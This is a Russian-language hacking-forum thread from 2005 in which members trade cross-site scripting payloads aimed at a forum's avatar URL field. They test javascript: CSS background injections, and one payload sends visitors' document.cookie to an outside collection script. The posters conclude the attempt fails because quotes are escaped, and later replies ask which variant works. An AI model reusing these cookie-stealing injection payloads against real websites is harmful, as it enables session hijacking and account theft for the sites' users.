HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 15.01.2005, 17:47
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами: 11893346

Репутация: 45


По умолчанию

Цитата:
Сообщение от b00  
Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg&quot; bb=&quot;http://antichat.ru
А так проходит?
Код:
  http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)

Последний раз редактировалось Че Гевара; 15.01.2005 в 18:20..
 
Ответить с цитированием

  #22  
Старый 15.01.2005, 17:57
b00
Новичок
Регистрация: 15.01.2005
Сообщений: 4
С нами: 11219101

Репутация: 0
По умолчанию

Цитата:
Сообщение от Че Гевара  
А так проходит?
Код:
 http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)
такая длинная конструкция - нет
<img src="http://aaa.bb/x.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:documen" alt="" /><br />

Да и админы уже года 2 IE не юзают
 
Ответить с цитированием

  #23  
Старый 15.01.2005, 18:58
b00
Новичок
Регистрация: 15.01.2005
Сообщений: 4
С нами: 11219101

Репутация: 0
По умолчанию

загнал в аватар тестовую строку
<img src="http://abc.ru/x.gif` style=`background:url(javascript:alert())" alt="" border="0" /><br /><br />

в IE не отработало
 
Ответить с цитированием

  #24  
Старый 15.01.2005, 19:53
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами: 11893346

Репутация: 45


По умолчанию

Он и не сработает ... Я что-то перемудрил по ходу дела....
По идее, сработает он в таком случае:
Код:
 <img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert()) alt="" border="0">
Но т.к. кавычки преобразуются, то он тоже не сработает ...)
Сейчас подумаем еще ...
 
Ответить с цитированием

  #25  
Старый 15.01.2005, 20:03
SHiTS
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
С нами: 11269766

Репутация: 39
По умолчанию

вот смотрю на вас и не знаю че сказать...
 
Ответить с цитированием

  #26  
Старый 15.01.2005, 20:14
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами: 11893346

Репутация: 45


По умолчанию

Как бы Егор меня не путал, по идее оба скрипта синтаксически верны:
Код:
     <img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert('1')) alt="" border="0">
     <img src=`http://abc.ru/x.gif`style=background-image:url(javascript:alert('2')) alt="" border="0">
И вот в чем была моя ошибка и чего я не учел:
Аватара отображается как
Код:
     <img src="http:/site/1.jpg" alt="" border="0" />
И само собой разумеется, что я предложил синтаксически неверно (в нашем случае):
Код:
      http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)
Все это преобразуется в <img src=" http://www.smailiki.nm.ru/lam/lam4.gif` .... ... что является галиматьей полной и естесственно не сработает ...
Получается - раз кавычки преобразуются в &quot; , то за пределы <img src="... никуда не выйти ...

Извиняюсь за свою ошибку - просто я не вчитался в тему ...

Последний раз редактировалось Че Гевара; 15.01.2005 в 20:18..
 
Ответить с цитированием

  #27  
Старый 15.01.2005, 20:42
b00
Новичок
Регистрация: 15.01.2005
Сообщений: 4
С нами: 11219101

Репутация: 0
По умолчанию

Ничего, со всякими случается.
 
Ответить с цитированием

  #28  
Старый 25.01.2005, 00:09
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

Не работает...
пишет:
Файл по указанному вами Url не содержит данных
чё не так?...
 
Ответить с цитированием

  #29  
Старый 25.01.2005, 15:51
byte57
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
С нами: 11209466

Репутация: 67


По умолчанию

да, попадается...
может на новых версиях не рубит фишка?
 
Ответить с цитированием

  #30  
Старый 04.02.2005, 16:20
san40
Новичок
Регистрация: 31.01.2005
Сообщений: 13
С нами: 11195928

Репутация: 0
По умолчанию

Дак а какой вариант верный???
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.